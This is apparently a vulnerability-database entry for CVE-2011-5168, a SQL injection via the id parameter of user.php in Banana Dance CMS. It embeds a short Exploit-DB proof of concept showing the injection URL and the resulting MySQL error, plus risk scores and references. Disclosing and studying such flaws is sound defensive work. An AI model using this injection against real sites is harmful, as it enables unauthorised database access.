CVE-2011-5168
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.5
Description
SQL injection vulnerability in user.php in Banana Dance before B.1.5 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Banana Dance CMS and Wiki - SQL Injection
+-----------------------+
| Banana Dance CMS+Wiki |
+-----------------------+
Vulnerable Web-App : Banana Dance CMS+Wiki
Vulnerability : SQLi
Author : Aodrulez.
Email : f3arm3d3ar@gmail.com
Google-Dork : :) Guess it.
Tested on : Ubuntu 10.04
Web-App : http://www.doyoubananadance.com/
Download Link : http://www.doyoubananadance.com/functions/dl.php?file=4e84e50f89bf7
+---------+
| Details |
+---------+
1] SQLi
Exploit : http://localhost/user.php?id=1'[sqli]
Error:
------
Invalid query:
SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id`='1''
Error: You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right
syntax to use near ''1''' at line 1
+----------+
| MalCon |
+----------+
(International Malware Conference)
The CFP for MalCon-2011 is ON!
If you think you are good enough, try cracking our
'Capture the Mal Challenge-2011' online.
Open to everyone!
For more details, visit http://malcon.org
+-------------------+
| Greetz Fly Out To |
+-------------------+
1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.isac.org.in
7] www.nsd.org.in
8] LiquidWorm
+-------+
| Quote |
+-------+
"Microsoft is not the answer. Microsoft is the question. NO is the answer." - Erik NaggumApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| bananadance | banana_dance | {"endIncluding":"0.9"} | |
References
- http://www.bananadance.org/Program-News/Minor-Update-and-New-Theme
- http://www.doyoubananadance.com/Program-News/Important-Notice-About-SQLi-Exploit
- http://www.exploit-db.com/exploits/17919
- http://www.osvdb.org/83882
- http://www.securityfocus.com/bid/49903
- http://www.bananadance.org/Program-News/Minor-Update-and-New-Theme
- http://www.doyoubananadance.com/Program-News/Important-Notice-About-SQLi-Exploit
- http://www.exploit-db.com/exploits/17919
- http://www.osvdb.org/83882
- http://www.securityfocus.com/bid/49903
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.